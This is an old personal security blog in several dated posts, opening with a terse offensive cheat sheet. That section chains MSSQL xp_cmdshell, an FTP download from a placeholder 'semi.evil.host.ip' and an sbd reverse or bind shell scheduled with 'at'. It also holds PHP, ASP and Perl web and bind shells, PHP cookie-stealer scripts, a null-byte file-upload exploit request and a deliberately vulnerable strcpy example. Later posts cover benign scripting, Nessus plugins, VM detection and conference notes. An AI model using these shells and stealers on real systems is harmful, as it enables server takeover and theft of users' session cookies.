{SQL template}

osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"

Pull data back to SQL:

c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe

Or be obvious:

net user add

On semi-evil box hoster: (Serve TFTP or FTP)
sbdbg.exe

{SQL template} set up FTP command script:

ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp

{SQL template} Execute FTP script:

FTP -s:script.ftp -A semi.evil.host.ip

{SQL template} setup reverse shell:

echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat

{SQL template} get time on server:
Dont forget ICMP timestamp requests instead..

time

{SQL template} schedule execution of bat file

at \\sql.vuln.box\ 04:20 evil.bat

connect from any.evil.ip

sbd sql.vuln.box 4337

Just some simple shell notes:

2007-03-06T14:59:00.000Z

Image inclusion
php (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images

PNG Headers

\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <=png Header
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width

Comment writers for jpegs
edjpgcom

Basic php shell

<?php
ob_clean();
system("[command]");
die();
?>

Using Echo
For windows:
echo: ^(carrots) are the escape sequence for systemIO redirects.

echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

unix:
write lol from echo with hex (no newline) to file

echo -en "\x6c\x6f\x6c" > file.ext

SBD (netcat style):
File Recieving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

although plink -raw and telnet are not as good they can work.

Play with Cookies

Simple cookie push

Cookie View

Javascript:alert(document.cookie);

Manipulate Cookie

Javascript:void(document.cookie=“variable=value”);

stealer.php

<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

Other stealers

<?php // line 1
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4

global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");

echo "<script>window.location.replace('".$Redirect."')</script>";
?>

Perl shell

#!/usr/bin/perl
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}

ASP Quicky whoami ?

<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>

ASP Shell
- WshShell.Exec error '80070005' likely

<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>

Curl into older PHP servers from chroot skeletons.

<?php
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);

$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;

print $data;
?>

Null Bytes
PHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg

CGI null byte stuff too..
see... php null byte

ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA

Gmail HTML Signatures - GreaseMonkey script

2007-02-15T23:56:00.000Z

So of course you cant create html signatures in gmail... ergg!

Silly rabbit, you can drag and drop images/html into the gmail Richtext editor...
well that just will not do.

So that would mean - greasemonkey script! Im not going to waste any time here.
GMAIL HTML SIGNATURE - Install this Script

//
// Released under the CC Attribution 2.5 license
// http://creativecommons.org/licenses/by/2.5/
// --------------------------------------------------------------------
//
// This is a Greasemonkey user script.
//
// To setup, insert html signature code into:
// * html_signature
// --------------------------------------------------------------------
//
// ==UserScript==
// @name GMAIL HTML Signature
// @namespace http://shad0wbq.answorld.com/
// @description Insert HTML signature into GMAIL
// @include http://gmail.google.com/*
// @include https://gmail.google.com/*
// @include http://mail.google.com/*
// @include https://mail.google.com/*
// ==/UserScript==
//
var html_signature = '<div style="margin: 0 auto 0 auto; margin-top: 5px; margin-bottom: 5px;" >' +
'<a href="http://feeds.feedburner.com/Codeburst">' +
'<img src="http://feeds.feedburner.com/Codeburst.gif" style="border:0" alt="codeBurst"/>' +
'</a></div>';

window.setTimeout(function() {
//Debug Frame window
// alert(window.frames[0].name);
if (window.frames[0])
{
if (window.frames[0].name == "v2_hc_compose")
{
var logo = window.frames[0].document.createElement("div");
logo.innerHTML = '<br><br>' + html_signature
window.frames[0].document.body.insertBefore(logo,window.frames[0].document.body.lastChild);
}
}
}, 600);

del.icio.us Regex

2007-02-12T22:20:00.000Z

I was working on bring in my collection of bookmarks for use on del.icio.us. There is still some work to be done on del.icio.us web interface, and most of the API apps that I used just didnt fit the bill so some quick regex helped with importation and exportation.

Main use for this was to enable sharing on all imported bookmarks.

So we need some regex for implementations on the api.

del.icio.us can read and export Netscape bookmark files.

These can very easily be modified via regex to work as api calls
Example API calls

https://api.del.icio.us/v1/posts/add?&url=http://www.testtest.com/&description=test test&tags=wee%20w00t&replace=yes&shared=yes
https://api.del.icio.us/v1/posts/delete?&url=http://www.testtest.com/

Regex Convertion for del.icio.us

(<dt><a href="http://www2.blogger.com/%29%28.*%29%28" tags=")(.*)(">)(.*)(</a></dt>)
https://api.del.icio.us/v1/posts/add?&url=\2&description=\6&tags=\4&replace=yes&shared=yes

Dirty Listing of Nessus Dangerous Plugins

2007-02-07T21:03:00.000Z

Tenable Nessus .. needed dangerous plugins descriptions

cd \progra~1\tenable\nessus\plugins\scripts\
egrep -l egrep -l "(ACT_DESTRUCT|ACT_DENIAL)" *.nasl>c:\temp\dangerous_list.txt

Quick vbs file..
Copy files from list in files to temp.

Dim objFileSystem, objInputFile, fso, aFile, afilename
Dim strInputFile, inputData, strData, strListFile, i

Const OPEN_FILE_FOR_READING = 1

' generate a filename base on the script name, here readfile.in
strListFile = "c:\temp\dangerous_list.txt"

Set objFileSystem = CreateObject("Scripting.fileSystemObject")
Set objInputFile = objFileSystem.OpenTextFile(strListFile, OPEN_FILE_FOR_READING)

' read everything in an array
afilename = "c:\progra~1\tenable\nessus\plugins\scripts\"

Do While Not objInputFile.AtEndOfStream
Dim Line
Line = objInputFile.readline
' Do something with "Line"
Set fso = CreateObject("Scripting.FileSystemObject")
Set aFile = fso.GetFile(afilename & trim(Line))
aFile.Copy("c:\temp\scripts\" & trim(Line))
Set aFile = Nothing
Set fso = Nothing
Loop

objInputFile.Close
Set objFileSystem = Nothing

WSCRIPT.QUIT(0)

Grab nessus extract tool via wget
Dump info to file .. done.

wget http://cvsweb.nessus.org/cgi-bin/viewcvs.cgi/
*checkout*/nessus-tools/nessus-extract/
nessus-extract.pl?rev=1.4.2.10&content-type=text/plain

perl nessus_extract.pl -p "c:\temp\scripts" >c:\temp\Dangerous_Plugins.txt

Apache redirect direct linked images...

2007-01-22T15:27:00.000Z

don’t direct link images .. bad things happen

RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http[s]?://(www\.)?yoururl\.com/.*$ [NC]
RewriteRule \.(gif|jpg|jpeg|bmp)$ redirected_image.jpg [L]

- credit fif3

Detecting VMMs - virtual machine monitors

2007-01-11T22:03:00.000Z

Red Pill...

int swallow_redpill () {
unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";
*((unsigned*)&rpill[3]) = (unsigned)m;
((void(*)())&rpill)();
return (m[5]>0xd0) ? 1 : 0;
}

redpill.c

redpill.exe
TrapKit.de info..

VMware fingerprint codes
scoopy doo - A VMware Fingerprint Suite

jerry - A(nother) VMware Fingerprinter

Northern Virginia Security Groups

2007-01-04T22:25:00.000Z

NoVA Sec

Pure technical gatherings for security professionals in the northern Virginia area. Check your certifications at the door

http://novasec.blogspot.com/

OWASP NoVA
OWASP chapter meetings are free and open to anyone interested in application security.
http://www.owasp.org/

MOAB / MOKB / VIZSEC '06

2007-01-03T15:00:00.000Z

Well to catch up a little on the vuln world.. There's a couple things I'm watching.

Month of Apple Bugs

Info-Pull's MoAB

PoC/Exploit are included with every release.. how nice.

Month Of Kernel Bugs

Info-Pull's the MoKB

Numerous Kernel bugs listed for FreeBSD 6.1, Linux 2.6, as well as OS X.

Retirement of Elsenot.com
Else not has officially closed its doors for updates..
"ElseNot part one is done. ElseNot part two may or may not start." ~ Layne

Conference VIZSEC '06

The preceding for the conference held on November 3rd 2006 have been posted. There are alot really interesting white papers.. here are a couple of interest..

2D Visualizations

"VAST: Visualizing Autonomous System Topology"

- Jon Oberheide, Manish Karir and Dionysus Blazakis [whitepaper] [presentation]

"FlowTag: A Collaborative Attack-Analysis, Reporting, and Sharing Tool for Security Researchers"

- Christopher P. Lee and John A. Copeland [whitepaper] [presentation]

"Understanding Multistage Attacks by Attack-Track based Visualization of Heterogeneous Event Streams"

- Sunu Mathew, Richard Giomundo, Shambhu J. Upadhyaya, Moises Sudit, Adam Stotz [whitepaper] [presentation]

"Visual Toolkit for Network Security Experiment Specification and Data Analysis"

- Lunquan Li, Peng Liu, George Kesidis [whitepaper] [presentation]

"An Intelligent, Interactive Tool for Exploration and Visualization of Time-Oriented Security Data"

- Asaf Shabtai, Denis Klimov, Yuval Shahar, and Yuval Elovici[whitepaper] [presentation]

"Visualizing DNS Traffic"

- Pin Ren, John Kristoff and Bruce Gooch [whitepaper] [presentation]

3D Visualizations

"Interactively Combining 2D and 3D Visualization for Network Traffic Monitoring"

- Erwan Le Malecot, Masayoshi Kohara, Yoshiaki Hori, and Kouichi Sakurai [whitepaper] [presentation]

"Real-Time Collaborative Network Monitoring and Control Using 3D Game Engines for Representation and Interaction"

- Warren Harrop and Grenville Armitage [whitepaper] [presentation]

Adopting 10 good habits of Unix Scripting

2006-12-18T15:53:00.000Z

I saw this on a quick fleeting moment on slash.dot .. It covers many things that I have done in the past..

Make directory trees in a single swipe.

Change the path; do not move the archive.

Combine your commands with control operators.

Quote variables with caution.

Use escape sequences to manage long input.

Group your commands together in a list.

Use xargs outside of find.

Know when grep should do the counting -- and when it should step aside.

Match certain fields in output, not just lines.

Stop piping cats.

Command Line Event Viewer

2006-11-20T18:53:00.000Z

Every once in while microsoft does something correctly.. Found the command line event viewer.

Using command-line tools to manage events and event logs
You can also use command-line utilities to create and query event logs and associate programs with particular logged events. For example, you can use Eventcreate to customize an event entry to a specified event log. Eventquery.vbs is used to list the events and event properties from one or more event logs. Eventtriggers enables you to create event triggers that will run programs upon the occurrence of specific events.

Google Codesearch - Finding Vulns

2006-11-19T01:02:00.000Z

Google Codesearch is a newer item in the google lab (Early October ). I like the functionality, but making all the code searchable will always find the bodies in the closet that not everyone wants to see.. The Google hacking database GHDB has been talking about it for awhile along with other noteable persons in the field.. just wondering if ISC/DSHIELD was interested in the topic for discussion..

The Search:
http://www.google.com/codesearch

Simple Buffer Overflows
Link: wikipedia Buffer_overflow

Search
lang:"c" strcpy buffer argv

or simply

buffer "should be big enough"

Using Google Code Search:

Found Examples of InSecure (Purposeful) Coding..Google Code Search

/* vuln.c */

#include

int main(int argc, char * argv [])
{
char buffer [500];

if (argc > 1)
strcpy(buffer, argv[1]);
return (0);
}

Finding Examples of correct implentation..Google Code Search

*hostdir = malloc(sizeof(char[strlen(argv[1])+1]));

/* separate hostname and dirname from 'hostname:dirname' format */

strcpy(hostdir, argv[1]);

Possible Example of Real Vulnerability Finding... in Nachos Example Operating System

#ifdef DEBUG
int main (int argc, char *
argv[]) {
char buffer[80];
printf ("string = %s.\n", strcpy (buffer, argv
[1]));
}
#endif

Link:Google Code Search

Site:Nachos URL

Combined Exploit Search Engine

2006-11-15T19:37:00.000Z

Combined Exploit Search Engine

Tweaked the Google Engine to include 150+ security websites from all over the globe.

Please join and collaborate.

Google Co-op release a couple weeks ago allows customization of the google engine..

XML to CSV transformation

2006-09-04T16:16:00.000Z

Eh.. well since I was playing with new requirements.. (means new languages.. ruby)
I ended up coming up with a simple transformation of XML to CSV for data normalization.
I found this to be useful with "nmap -oX xmlout.xml" output switch
Anyway long story short here is the quick and dirty.

# RUBY use of WIN32OLE
# Win32 OLE Q&A & Ruby stddoc

require 'win32ole'

excel = WIN32OLE.new('Excel.Application')
#excel['Visible'] = true
excel.workbooks.openxml({'Filename'=>'F:\xml_out.xml', 'LoadOption'=>2})
excel.ActiveWorkbook.SaveAs({'Filename'=>'F:\csv_in.csv','FileFormat'=>24, 'CreateBackup'=>'False'})
excel.quit

Python and Dabo

2006-07-14T01:00:00.000Z

Since being pushed into Core (Impact), I've started to really dive in to some python coding.. To my total suprise there is a really great project in python called DABO! It is framework for GUI, database, and report generation. It would be nice to wrap a number of cli tools into a db based open source reporting tool. Wikto which is horrible at best for a gui, seems to be one of the wrap up tools in the win32 enviroment. I suppose that good wrapping (like the old cheops-ng) is inorder.. and to make it cross platform (thanks python wxpython) with professional output. Lets all start the integration engine... count down.

hdm - MOBB bug releases

2006-07-13T18:03:00.000Z

[[hdm]] has been releasing a number browser bugs this month named MOBB(month of browser bugs). He was able to find these by running different browsers through DOM /CSS / and DHTML fuzzers in an attempt to crash the engines and other ways.

Hamachi - DHTML fuzzer that recursively calls XMLHTTP in an attempt to iterate through arrays of possible DHTML element properties. It attempts format string vulnerabilities, long file paths, long urls, and difficult integer injection.

CSS-Die - CSSDIE looks for common CSS1/CSS2/CSS3 implementation flaws by specifying common bad values for style values. This is similiar to Hamachi in that it performs format string vulnerabilities, long file paths, long urls, and difficult integer injection.

DOM-Hanoi - DOM-Hanoi looks for common DHTML implementation flaws by adding/removing DOM elements. This is done through obj.appendChild and obj.removeChild methods.

MangleMe - Mangleme sends format string vulnerabilities, bad characters, malformed javascript & applet requests, long urls, load requests with junk.

Most of his scripts have been attempting to locate vulnerabilities in the following browsers...
konqueror, safari, omniweb, opera, webTV, icab, ie6, mozilla

SANSFIRE 2006

2006-07-12T20:30:00.000Z

Just got back from SANSFIRE 2006.. Enjoyed the challenge of learning a bunch of new stuff from the instructors there. Lets see.. couple topics of interest..

WMI Promqry & Promqryui
-- wow windows actually has something of interest.

Spycar
-- IE browser malware checks

netstat (win32 xpsp2/2003)-- netstat -naob (shows dll linkage during mapping of executables/ports)
the -b switch adds some more interesting items.. but its slow... slow.

webgoat-- OWASP super buggy web-app for teaching secure coding.

Some how missed a few other tools this year such as wellenrieter, macshift, bidiblah, and nohup.

windump - finding the pcap device mapping

2006-06-25T20:08:00.000Z

Looking at windump,( yeah.. for some reason I am currently sniffing in a windows enviroment) I was having a tough time locating the correct procedures for finding the capture device. I know that the devices can be located via the drop selection in Ethereal (WireShark June '06), but finding it from the command line provided to be difficult, especially via remote executions.

Why not use "windump -D", well.. I wanted to know the mappings of Local Area Connection. This script also allows for you parse its output encase you wanted to use it in conjunction with other remote execution methods such as wmic!

I have a quick vbs script that can read the registry and I've located a fairly easy lookup method.

Finding the Device from Regedit:

HKLM\SYSTEM\CurrentControlSet\Control\Network\
Identify the Key set with the Value "{Default}" containing Data "Network Adapters "
Search the listed Adapter for the Value Name containing the Data "Local Area Connection"
The Key value that contains "Local Area Connection" is the reference to the physical device identifier
Pre-append "\Device\NPF_" to the Key

Example: \Device\NPF_{95007697-9E3B-41C0-9732-19063EBA4376}
From this key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet \Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318} \{95007697-9E3B-41C0-9732-19063EBA4376}

This can be customized for running from any named connection identified from

ipconfig /all

Download pcap_adapter.vbs

Example Comparision using search for "local"

C:\>cscript pcap_adapter.vbs "local" localhost -w test.txt
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.

Local Area Connection {EE878E44-6F4F-4CEB-93D3-3C9F8BB6B75C}

1 matches returned.
Finished writing to file. Results saved to test.txt

C:\>windump -D
1.\Device\NPF_GenericDialupAdapter (Generic dialup adapter)
2.\Device\NPF_{5A28A595-2DF1-4B68-84ED-9472E2B623C1} (Intel(R) PRO/Wireless 2915ABG Network Connection (Microsoft's Packet Scheduler) )
3.\Device\NPF_{EE878E44-6F4F-4CEB-93D3-3C9F8BB6B75C} (Broadcom NetXtreme Gigabit Ethernet Driver (Microsoft's Packet Scheduler) )
4.\Device\NPF_{768194C6-D64E-4C01-B933-1C1724B7DA9E} (VMware Virtual Ethernet Adapter)
5.\Device\NPF_{8941359A-87BF-4EDA-A287-A3A5B2AFF1B3} (VMware Virtual Ethernet Adapter)

When {Puffy} Meets ^RedDevil^: Monkey tricks: Extracting Viruses/Worms

2006-05-10T00:55:00.000Z

When {Puffy} Meets ^RedDevil^: Monkey tricks: Extracting Viruses/Worms

This is an extraordinary good point of reference for something I've been trying do with numerous tools. Though most of the time I end up rebuilding binary files from scratch using hexworkshop and ethereal / packetyzer... This is great!

More work..

2006-04-27T20:30:00.000Z

Built fpg(a false positive generator) from FLop to test an IDS the other day. Pretty nice. I know there are others called stik.. & something else. Might even send the picture post card to the addy in the INSTALL.

Busy as a bee building interfaces for sguil and the IDS fleet. Wrote a bunch of VBS scripts as well that can interface fairly nicely with wmic and AD.. hey at least the MCSE comes in handy in that respect. blah. Hopefully I will find a place once the server is up to post this garbage.

Tail -f Unix through JAVA

2006-04-26T14:06:00.000Z

I've been wandering around the internet looking for a good way to implement the tail -f unix within java. If your unfamiliar with tail, well.. shame.

Tail -f Unix

This tutorial is actually really nice.. If you look around you will notice

Tail-f Unix across a client-server relationship

Mind Movement

2006-04-18T19:38:00.000Z

Visual Basic Scripting, mainly Active Directory, has been taking a large portion of my life recently. I've been nose deep in vbs / cscritpting cli's and bring forth my powers of tcl.tk to bear as well. Who knows maybe somebody will eventually like my code.. blah!

I dont understand why microsoft doesnt more easily disimenate information about included files and stuctures.. thats really annoying to me.

"~:\Program Files\Microsoft Office\OFFICE11\1033\VBSCRIP5.CHM"

Thats an fairly good start especially if your looking at :

"mk:@MSITStore:~:\Program%20Files\Microsoft%20Office\OFFICE11\1033 /\VBSCRIP5.CHM::/html/vsgrpFeatures.htm"

I ended up with some great code from http://www.kouti.com/scripts.htm

With that as a base.. I've made some really great cli/pipeable tools to replace all the crap of dsget.exe.

Other Active Directory and Services are pestering my mind as well..

Numerous general tools such as ADfind and SVCutil are big help

Additional kung-fu from WMIC interfaces